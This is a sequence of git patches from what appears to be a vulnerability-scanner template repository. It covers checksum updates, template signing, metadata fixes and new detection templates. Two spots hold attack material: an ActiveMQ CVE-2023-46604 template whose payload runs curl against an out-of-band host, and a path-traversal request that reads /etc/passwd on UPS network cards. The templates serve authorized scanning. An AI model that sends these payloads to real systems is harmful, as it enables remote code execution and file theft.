19:19:36 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 6ba563c418..b1f3af28bf 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -6431,7 +6431,7 @@ http/technologies/fanruanoa-detect.yaml:e7b2e01057d3be79d3ddbcc64b33f9af7a33bbb1 http/technologies/fanruanoa2012-detect.yaml:f9a6f78d0d2e34d49a10f73f592bd87169259bac http/technologies/fastjson-version.yaml:50f165d16a31d441a597695102e983ebbaa1857a http/technologies/favicon-detect.yaml:10cb70dd76719f7850249d0b9184054205fd47f5 -http/technologies/fingerprinthub-web-fingerprints.yaml:395162bda66fdf4f6e2de47431c5200fe145dfa5 +http/technologies/fingerprinthub-web-fingerprints.yaml:4dbe54eb11797d8ee2acfbafbf269363102734bd http/technologies/froxlor-detect.yaml:67aaf702a20981d17394938929f1835d6b48e6b2 http/technologies/geo-webserver-detect.yaml:53e3388afdaa4abc6d221db435f0c3ee78dfe3e9 http/technologies/geth-server-detect.yaml:caf614fcafdfca5f044916adf9dde2abb41b46a9 @@ -6537,7 +6537,7 @@ http/technologies/microsoft/aspnetmvc-version-disclosure.yaml:341d9ec2d4e676c7d0 http/technologies/microsoft/default-iis7-page.yaml:c4e22ee6e9c969c526ea2609a510a8e23150963d http/technologies/microsoft/default-microsoft-azure-page.yaml:edf6bd39671cbd1eeda217a1956965a66e368d06 http/technologies/microsoft/default-windows-server-page.yaml:eddc0c09081a8fdfdd579671ba67816b49e8bb81 -http/technologies/microsoft/microsoft-iis-version.yaml:879e7e413c5a14c9f8d60c781d1a2d6e14082a0c +http/technologies/microsoft/microsoft-iis-version.yaml:388eeed4e41d6681d1715a232292e33ee19e1ae3 http/technologies/microsoft/microsoft-sharepoint-detect.yaml:dabe925d2623a1e643cc36887c63daa6079a51d7 http/technologies/microsoft/ms-exchange-server.yaml:ac56edde8f4b9be40add08dffaa028504eeedd69 http/technologies/microsoft/sql-server-reporting.yaml:f09e2468fe44fbccafc12b034f080bee81f7c7e8 @@ -8176,7 +8176,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:c39f1ef0b33169857d5d46a8397b6894d92ff8a4 +templates-checksum.txt:30add9985a0dfd3be88361eb34dcd71c7d70f2c6 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 516ef9acd478f987368a317691e0a18d4dd3b1c4 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 20 Mar 2024 19:21:17 +0000 Subject: [PATCH 49/86] Auto Template Signing [Wed Mar 20 19:21:17 UTC 2024] :robot: --- http/technologies/microsoft/microsoft-iis-version.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/http/technologies/microsoft/microsoft-iis-version.yaml b/http/technologies/microsoft/microsoft-iis-version.yaml index ac03e25967..d85e1c2ad9 100644 --- a/http/technologies/microsoft/microsoft-iis-version.yaml +++ b/http/technologies/microsoft/microsoft-iis-version.yaml @@ -29,5 +29,4 @@ http: part: header kval: - Server - -# digest: 490a0046304402204aec8d1c4678a40a8ca831d952b351c4ca885fb845222a559099426e6a27ba9602204f9487670472a494fcecc37f1ebc08e68f6c3007de6fae438c5f5b7210e66a87:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502207a63b4fb5117f7f1168ba477b97deaa35e7e38c9355639a7df7c8f6f54fa960c022100e3d3f3c25ecff01f75a723ca2df3e64e5ea725d7cc61f70ef54e41f6899fc359:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 02c060a8e43fdcd8dfd34b0cf7369559fe3b900b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=88=91=E4=BC=9A=E5=95=8AD=2C=E6=98=8E=E5=B0=8F=E5=AD=90?= =?UTF-8?q?=2C=E5=BE=A1=E5=89=91?= <104293903+pwnhxl@users.noreply.github.com> Date: Thu, 21 Mar 2024 08:29:27 +0800 Subject: [PATCH 50/86] fix tag CVE-2012-4253.yaml --- http/cves/2012/CVE-2012-4253.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2012/CVE-2012-4253.yaml b/http/cves/2012/CVE-2012-4253.yaml index cc95c455b2..046f3fb2ab 100644 --- a/http/cves/2012/CVE-2012-4253.yaml +++ b/http/cves/2012/CVE-2012-4253.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: mysqldumper product: mysqldumper - tags: cve2012,cve,packetstorm,lfi,edb,mysqldumper,xss + tags: cve2012,cve,packetstorm,lfi,edb,mysqldumper http: - method: GET @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100eefa80b385734b0a1e6f33288900b62b779941de6560c529987c9593f998d354022100a78e22cf092547bdbd7693f37f2f5fe8f9d4858b98c6fcfc32c3cf37b6f96274:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100eefa80b385734b0a1e6f33288900b62b779941de6560c529987c9593f998d354022100a78e22cf092547bdbd7693f37f2f5fe8f9d4858b98c6fcfc32c3cf37b6f96274:922c64590222798bb761d5b6d8e72950 From 0c131b2eac88b33ac1d0059f790327224381deca Mon Sep 17 00:00:00 2001 From: mzack Date: Thu, 21 Mar 2024 02:57:08 +0100 Subject: [PATCH 51/86] fixing faulty template --- javascript/cves/2023/CVE-2023-46604.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/cves/2023/CVE-2023-46604.yaml b/javascript/cves/2023/CVE-2023-46604.yaml index 40231ce6c3..e7326fd2cf 100644 --- a/javascript/cves/2023/CVE-2023-46604.yaml +++ b/javascript/cves/2023/CVE-2023-46604.yaml @@ -40,7 +40,7 @@ javascript: let b = m2.Buffer(); let name=Host+':'+Port; let conn = m1.Open('tcp', name); - let randomvar = '{{randstr}}' + let randomvar = '{{randstr}}'.toLowerCase(); var Base64={encode: btoa} exploit_xml=`http://${oob}/b64_body:`+Base64.encode(' bash-ccurl http://$(echo '+randomvar+').'+oob+' ') +'/' packet="00000001100000006401010100436f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e46696c6553797374656d586d6c4170706c69636174696f6e436f6e74657874010" From a2b5863af447952626bd9d9282ec1c6780fc4724 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 21 Mar 2024 05:00:49 +0000 Subject: [PATCH 53/86] Auto Generated Templates Checksum [Thu Mar 21 05:00:49 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index b1f3af28bf..07d57b29ee 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -976,7 +976,7 @@ http/cves/2012/CVE-2012-2371.yaml:c9b170834b0f6878fbd65a84289f9dde6cdf6edf http/cves/2012/CVE-2012-3153.yaml:9632dbed943428a3ce82bd26243e96bb53e0101f http/cves/2012/CVE-2012-4032.yaml:c433e79a48badc5d9996e22bcd1939ee98401e92 http/cves/2012/CVE-2012-4242.yaml:d4acd90297d0e2c72a092b7a02a3cd8d9b532923 -http/cves/2012/CVE-2012-4253.yaml:8191f7e69d1dbec2c0b9ea2f687eafa87eeb2214 +http/cves/2012/CVE-2012-4253.yaml:93bd7e8a7190482cf491b58ff39abf24dc655387 http/cves/2012/CVE-2012-4273.yaml:d7e6647482c7d87038483b2bc94a26745bb3c841 http/cves/2012/CVE-2012-4547.yaml:d254026e048515763754a600a75aab80318b79f5 http/cves/2012/CVE-2012-4768.yaml:61df87600a157bab6ca0ae1244cf87d5dbb36af7 @@ -6537,7 +6537,7 @@ http/technologies/microsoft/aspnetmvc-version-disclosure.yaml:341d9ec2d4e676c7d0 http/technologies/microsoft/default-iis7-page.yaml:c4e22ee6e9c969c526ea2609a510a8e23150963d http/technologies/microsoft/default-microsoft-azure-page.yaml:edf6bd39671cbd1eeda217a1956965a66e368d06 http/technologies/microsoft/default-windows-server-page.yaml:eddc0c09081a8fdfdd579671ba67816b49e8bb81 -http/technologies/microsoft/microsoft-iis-version.yaml:388eeed4e41d6681d1715a232292e33ee19e1ae3 +http/technologies/microsoft/microsoft-iis-version.yaml:dcf1fea08a8e195fb4fb800bddc0355619141c06 http/technologies/microsoft/microsoft-sharepoint-detect.yaml:dabe925d2623a1e643cc36887c63daa6079a51d7 http/technologies/microsoft/ms-exchange-server.yaml:ac56edde8f4b9be40add08dffaa028504eeedd69 http/technologies/microsoft/sql-server-reporting.yaml:f09e2468fe44fbccafc12b034f080bee81f7c7e8 @@ -8176,7 +8176,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:30add9985a0dfd3be88361eb34dcd71c7d70f2c6 +templates-checksum.txt:05e0c517f0d08f9334bb67bf6c18a1ccafde36eb wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From cf8cd4f27a74fa4712a830672ea5b888b88b17c1 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 21 Mar 2024 05:02:28 +0000 Subject: [PATCH 54/86] Auto Template Signing [Thu Mar 21 05:02:28 UTC 2024] :robot: --- http/cves/2012/CVE-2012-4253.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2012/CVE-2012-4253.yaml b/http/cves/2012/CVE-2012-4253.yaml index 046f3fb2ab..fbe3a390e6 100644 --- a/http/cves/2012/CVE-2012-4253.yaml +++ b/http/cves/2012/CVE-2012-4253.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100eefa80b385734b0a1e6f33288900b62b779941de6560c529987c9593f998d354022100a78e22cf092547bdbd7693f37f2f5fe8f9d4858b98c6fcfc32c3cf37b6f96274:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100de6cb5ae696eb8f0b8837ff02b5e53e8049e806e0253c9933027f7da28634071022100fc1518b608713661374a7f1ebd5ef01b8816925196928a73aa3882adf5bf8192:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From d28d819eecb2b12a4da86b4f7a2d9103bc211d35 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 21 Mar 2024 12:20:10 +0530 Subject: [PATCH 55/86] fix-formatting --- http/exposed-panels/softether-vpn-panel.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/exposed-panels/softether-vpn-panel.yaml b/http/exposed-panels/softether-vpn-panel.yaml index 3ec9615e2f..eb18a9aa34 100644 --- a/http/exposed-panels/softether-vpn-panel.yaml +++ b/http/exposed-panels/softether-vpn-panel.yaml @@ -4,7 +4,8 @@ info: name: SoftEther VPN Panel - Detect author: bhutch severity: info - description: SoftEther VPN panel was detected. + description: | + SoftEther VPN panel was detected. metadata: max-request: 1 verified: true From b1b540179aa297e2f3c9767d174d126eed204917 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 21 Mar 2024 13:08:19 +0530 Subject: [PATCH 56/86] Update drupal-install.yaml --- http/exposures/files/drupal-install.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/exposures/files/drupal-install.yaml b/http/exposures/files/drupal-install.yaml index 6bc4fa3159..bc154f9f53 100644 --- a/http/exposures/files/drupal-install.yaml +++ b/http/exposures/files/drupal-install.yaml @@ -3,7 +3,7 @@ id: drupal-install info: name: Drupal Install author: NkxxkN - severity: low + severity: critical description: Drupal Install panel exposed. metadata: max-request: 2 @@ -23,4 +23,4 @@ http: - type: word words: - "Choose language | Drupal" -# digest: 490a0046304402206f6f65e8aa3223ec1f67b0e97780b4bc7d9ddc28af4ba9562d4d52ae06946a82022037c67f1e4b8c5b8bac6369fb8a23830b76a97f8188317b70b7275c284b201b8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206f6f65e8aa3223ec1f67b0e97780b4bc7d9ddc28af4ba9562d4d52ae06946a82022037c67f1e4b8c5b8bac6369fb8a23830b76a97f8188317b70b7275c284b201b8c:922c64590222798bb761d5b6d8e72950 From 0cd4e5a335c7675189e58fd588aca060a6316af0 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 21 Mar 2024 13:11:35 +0530 Subject: [PATCH 57/86] Update and rename drupal-install.yaml to drupal-install.yaml --- .../files => misconfiguration/installer}/drupal-install.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename http/{exposures/files => misconfiguration/installer}/drupal-install.yaml (91%) diff --git a/http/exposures/files/drupal-install.yaml b/http/misconfiguration/installer/drupal-install.yaml similarity index 91% rename from http/exposures/files/drupal-install.yaml rename to http/misconfiguration/installer/drupal-install.yaml index bc154f9f53..282cedeb23 100644 --- a/http/exposures/files/drupal-install.yaml +++ b/http/misconfiguration/installer/drupal-install.yaml @@ -3,12 +3,12 @@ id: drupal-install info: name: Drupal Install author: NkxxkN - severity: critical + severity: high description: Drupal Install panel exposed. metadata: max-request: 2 shodan-query: http.component:"drupal" - tags: exposure,drupal + tags: misconfig,drupal,install,exposure http: - method: GET From 0638540f77d37de7b8b418b6e3247f18594fe62c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 21 Mar 2024 07:45:49 +0000 Subject: [PATCH 59/86] Auto Generated Templates Checksum [Thu Mar 21 07:45:49 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 07d57b29ee..1eb6877577 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -976,7 +976,7 @@ http/cves/2012/CVE-2012-2371.yaml:c9b170834b0f6878fbd65a84289f9dde6cdf6edf http/cves/2012/CVE-2012-3153.yaml:9632dbed943428a3ce82bd26243e96bb53e0101f http/cves/2012/CVE-2012-4032.yaml:c433e79a48badc5d9996e22bcd1939ee98401e92 http/cves/2012/CVE-2012-4242.yaml:d4acd90297d0e2c72a092b7a02a3cd8d9b532923 -http/cves/2012/CVE-2012-4253.yaml:93bd7e8a7190482cf491b58ff39abf24dc655387 +http/cves/2012/CVE-2012-4253.yaml:22bb780ede0f6ee252aa15a98a2b1c8d437494e4 http/cves/2012/CVE-2012-4273.yaml:d7e6647482c7d87038483b2bc94a26745bb3c841 http/cves/2012/CVE-2012-4547.yaml:d254026e048515763754a600a75aab80318b79f5 http/cves/2012/CVE-2012-4768.yaml:61df87600a157bab6ca0ae1244cf87d5dbb36af7 @@ -4528,7 +4528,6 @@ http/exposures/files/desktop-ini-exposure.yaml:e1f2848de5e29a1d1f0069c15a5451d38 http/exposures/files/django-secret-key.yaml:9a9152c6627c7d1bb85923caedf61303f26e78b9 http/exposures/files/docker-cloud.yaml:1cd831e6d009b49e120b14206b7a19b825fd5272 http/exposures/files/domcfg-page.yaml:28b2f74eed60f6bf047db658ffcf8ccbacfb90a4 -http/exposures/files/drupal-install.yaml:becf211637e4dbbe6b1f0fa018d53f4ea23de648 http/exposures/files/ds-store-file.yaml:679fb351af4567e417c0697f8d3298ddc14767b4 http/exposures/files/dwsync-exposure.yaml:811dc04f9ef973b6d48e8b007590508b61230b4b http/exposures/files/environment-rb.yaml:cfd936dc5174ec7eee345830477ad8ee013d5eb4 @@ -5134,6 +5133,7 @@ http/misconfiguration/installer/discourse-installer.yaml:cf9bf85966145a193efedf3 http/misconfiguration/installer/dokuwiki-installer.yaml:a572ea8dd4751008cd46b4319fe478d147173ac7 http/misconfiguration/installer/dolibarr-installer.yaml:6c971d39c8f61247ee422817192d8d1af5918a3f http/misconfiguration/installer/dolphin-installer.yaml:66ccbdc0d810c8fb5876d46e8c7780da1efd6057 +http/misconfiguration/installer/drupal-install.yaml:8935c0e57b3677226b50338b8495600390d3e8b0 http/misconfiguration/installer/easyscripts-installer.yaml:4cb8db53f08ed1bf8172866766c33878f579fda9 http/misconfiguration/installer/eshop-installer.yaml:c83244265e0cd9499cee6ecfd6fda805b6475251 http/misconfiguration/installer/espeasy-installer.yaml:051a8d1869f34a42c6d6a287ff2668c3b07c2b99 @@ -8176,7 +8176,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:05e0c517f0d08f9334bb67bf6c18a1ccafde36eb +templates-checksum.txt:128d6f230562518d7dd61144f475986ae8d2e63c wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 9b16d8e79707b4f706c7c4369912e55cd7615fc7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 21 Mar 2024 07:47:25 +0000 Subject: [PATCH 60/86] Auto Template Signing [Thu Mar 21 07:47:25 UTC 2024] :robot: --- http/misconfiguration/installer/drupal-install.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/misconfiguration/installer/drupal-install.yaml b/http/misconfiguration/installer/drupal-install.yaml index 282cedeb23..734fee7e5b 100644 --- a/http/misconfiguration/installer/drupal-install.yaml +++ b/http/misconfiguration/installer/drupal-install.yaml @@ -23,4 +23,4 @@ http: - type: word words: - "Choose language | Drupal" -# digest: 490a0046304402206f6f65e8aa3223ec1f67b0e97780b4bc7d9ddc28af4ba9562d4d52ae06946a82022037c67f1e4b8c5b8bac6369fb8a23830b76a97f8188317b70b7275c284b201b8c:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220115cf9e237a9e0e09034a814da536ec254ae826df2023819714ad7677814606102207ecda93edc69d914ee07bed7be0c76fcae80cd410e6a511552cd3686c8e6e785:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 9a10b14360ea16d8b49200c3fedefee8c9c10b41 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Thu, 21 Mar 2024 11:21:05 -0400 Subject: [PATCH 61/86] ups lfi add --- .../other/ups-network-lfi.yaml | 37 +++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 http/vulnerabilities/other/ups-network-lfi.yaml diff --git a/http/vulnerabilities/other/ups-network-lfi.yaml b/http/vulnerabilities/other/ups-network-lfi.yaml new file mode 100644 index 0000000000..849a2a4d87 --- /dev/null +++ b/http/vulnerabilities/other/ups-network-lfi.yaml @@ -0,0 +1,37 @@ +id: ups-network-lfi + +info: + name: UPS Network Management Card 4 Path Traversal + author: Kazgangap + severity: high + description: | + UPS Network Management Card version 4 suffers from a path traversal vulnerability. + reference: + - https://packetstormsecurity.com/files/177626/upsnmc4-traversal.txt + - https://www.exploit-db.com/exploits/51897 + metadata: + max-request: 1 + verified: true + shodan-query: html:"UPS Network Management Card 4" + tags: ups,lfi + +http: + - method: GET + path: + - "{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: word + part: header + words: + - "application/octet-stream" + + - type: status + status: + - 200 From 153d08d97ce8e43bda411f5935f5cd07bb43d0fb Mon Sep 17 00:00:00 2001 From: Ricardo Maia Date: Thu, 21 Mar 2024 23:23:39 -0300 Subject: [PATCH 62/86] Add Directus Detect --- http/technologies/directus-detect.yaml | 30 ++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 http/technologies/directus-detect.yaml diff --git a/http/technologies/directus-detect.yaml b/http/technologies/directus-detect.yaml new file mode 100644 index 0000000000..91767c6618 --- /dev/null +++ b/http/technologies/directus-detect.yaml @@ -0,0 +1,30 @@ +id: directus-detect + +info: + name: Directus - Detect + author: ricardomaia + severity: info + description: | + Directus is a content manager with dynamic access API generation and transparent integration with the main databases. + reference: + - https://directus.io/ + metadata: + max-request: 1 + google-query: intitle:directus "Not Authenticated" + verified: true + tags: tech,directus,detect + +http: + - method: GET + stop-at-first-match: true + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 1 + matchers: + - type: word + case-insensitive: true + part: header + words: + - "X-Powered-By: Directus" From 318211f55b0f7769ce4331b6ff96f6c7044ae34b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=88=91=E4=BC=9A=E5=95=8AD=2C=E6=98=8E=E5=B0=8F=E5=AD=90?= =?UTF-8?q?=2C=E5=BE=A1=E5=89=91?= <104293903+pwnhxl@users.noreply.github.com> Date: Fri, 22 Mar 2024 12:24:04 +0800 Subject: [PATCH 63/86] tag add --- http/default-logins/alibaba/canal-default-login.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/default-logins/alibaba/canal-default-login.yaml b/http/default-logins/alibaba/canal-default-login.yaml index 30838d3b88..e3f11bed1e 100644 --- a/http/default-logins/alibaba/canal-default-login.yaml +++ b/http/default-logins/alibaba/canal-default-login.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-522 metadata: max-request: 1 - tags: alibaba,default-login + tags: canal,alibaba,default-login http: - raw: From 6405d33af9f23be45dddecb8ba18bd4d9cf41225 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 22 Mar 2024 07:33:10 +0000 Subject: [PATCH 65/86] Auto Generated Templates Checksum [Fri Mar 22 07:33:10 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 1eb6877577..d127627215 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5133,7 +5133,7 @@ http/misconfiguration/installer/discourse-installer.yaml:cf9bf85966145a193efedf3 http/misconfiguration/installer/dokuwiki-installer.yaml:a572ea8dd4751008cd46b4319fe478d147173ac7 http/misconfiguration/installer/dolibarr-installer.yaml:6c971d39c8f61247ee422817192d8d1af5918a3f http/misconfiguration/installer/dolphin-installer.yaml:66ccbdc0d810c8fb5876d46e8c7780da1efd6057 -http/misconfiguration/installer/drupal-install.yaml:8935c0e57b3677226b50338b8495600390d3e8b0 +http/misconfiguration/installer/drupal-install.yaml:afa701be86d508093f72f596b7381ed76abd7c36 http/misconfiguration/installer/easyscripts-installer.yaml:4cb8db53f08ed1bf8172866766c33878f579fda9 http/misconfiguration/installer/eshop-installer.yaml:c83244265e0cd9499cee6ecfd6fda805b6475251 http/misconfiguration/installer/espeasy-installer.yaml:051a8d1869f34a42c6d6a287ff2668c3b07c2b99 @@ -7992,7 +7992,7 @@ http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml:80348e0fda22d428224a9a62afae01b8380 http/vulnerabilities/zzzcms/zzzcms-xss.yaml:61a6fd65556054e8e2a631080388aff7aed42f6b javascript/cves/2016/CVE-2016-8706.yaml:823829801f090b3c8aa0b65a21f506da440cb2a0 javascript/cves/2023/CVE-2023-34039.yaml:d24071fd6387e212e60bd6503d2611015bea58cb -javascript/cves/2023/CVE-2023-46604.yaml:5f4409197ba9dd7f86ae5de4beb6409ce7f1bfb8 +javascript/cves/2023/CVE-2023-46604.yaml:7fde2860cded498d346bfe3a70bdee06bc6b780d javascript/cves/2024/CVE-2024-23897.yaml:2de4bb803c9ebd5e8a989cc1760102ea53ee95d3 javascript/default-logins/mssql-default-logins.yaml:b95502ea9632648bc430c61995e3d80d0c46f161 javascript/default-logins/postgres-default-logins.yaml:0b960d1c695d009536b0846c5a393731d3fac7ad @@ -8176,7 +8176,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:128d6f230562518d7dd61144f475986ae8d2e63c +templates-checksum.txt:9fd40bc7e1d2a108145497f32509e664af53af65 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 5e1bb9d7d85824378d721f07c1fb01be1a848eb7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 22 Mar 2024 07:34:51 +0000 Subject: [PATCH 66/86] Auto Template Signing [Fri Mar 22 07:34:51 UTC 2024] :robot: --- javascript/cves/2023/CVE-2023-46604.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/cves/2023/CVE-2023-46604.yaml b/javascript/cves/2023/CVE-2023-46604.yaml index e7326fd2cf..926ccba63a 100644 --- a/javascript/cves/2023/CVE-2023-46604.yaml +++ b/javascript/cves/2023/CVE-2023-46604.yaml @@ -61,4 +61,4 @@ javascript: - 'contains(interactsh_protocol, "dns")' - 'contains(interactsh_request, response)' condition: and -# digest: 4a0a004730450220072242f64d49392155c8bd39d873097b2d61c950543e6aed9e10de3504f6c99202210089c83d599670a33b43a312a55f6ef5dce55b3861aa538160fa40802c06d6a00f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c9d0d2f9b39ad03129d83fcc2561733c1ffdb8119572c0f222d529083466f7b1022100b6db80c8ccd45b35ec5ebafceefbf53d92b365fc01041ad991036346155950c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 08dc5c90c719016bdacd116a3228664310c5d5bc Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 22 Mar 2024 13:07:25 +0530 Subject: [PATCH 67/86] update-workflow --- workflows/default-application-workflow.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/workflows/default-application-workflow.yaml b/workflows/default-application-workflow.yaml index 03b65efc24..42b418ab7f 100644 --- a/workflows/default-application-workflow.yaml +++ b/workflows/default-application-workflow.yaml @@ -4,6 +4,7 @@ info: name: Default Web Application Detection author: andydoering description: Detects default installations of web applications + workflows: - template: http/technologies/apache/default-apache-test-all.yaml @@ -23,7 +24,7 @@ workflows: - template: http/technologies/default-django-page.yaml - - template: http/exposures/files/drupal-install.yaml + - template: http/misconfiguration/installer/drupal-install.yaml - template: http/technologies/oracle/default-oracle-application-page.yaml From c37769da01b0ac4def0c3779676b47367c6c4b8f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 22 Mar 2024 07:41:50 +0000 Subject: [PATCH 68/86] Auto Generated Templates Checksum [Fri Mar 22 07:41:50 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index d127627215..05fe547af1 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -7992,7 +7992,7 @@ http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml:80348e0fda22d428224a9a62afae01b8380 http/vulnerabilities/zzzcms/zzzcms-xss.yaml:61a6fd65556054e8e2a631080388aff7aed42f6b javascript/cves/2016/CVE-2016-8706.yaml:823829801f090b3c8aa0b65a21f506da440cb2a0 javascript/cves/2023/CVE-2023-34039.yaml:d24071fd6387e212e60bd6503d2611015bea58cb -javascript/cves/2023/CVE-2023-46604.yaml:7fde2860cded498d346bfe3a70bdee06bc6b780d +javascript/cves/2023/CVE-2023-46604.yaml:ded5a8bcb92125c053b218e259931104983bd625 javascript/cves/2024/CVE-2024-23897.yaml:2de4bb803c9ebd5e8a989cc1760102ea53ee95d3 javascript/default-logins/mssql-default-logins.yaml:b95502ea9632648bc430c61995e3d80d0c46f161 javascript/default-logins/postgres-default-logins.yaml:0b960d1c695d009536b0846c5a393731d3fac7ad @@ -8176,7 +8176,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:9fd40bc7e1d2a108145497f32509e664af53af65 +templates-checksum.txt:85f803445c04e3767bca7543b712f870fbe8bc26 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 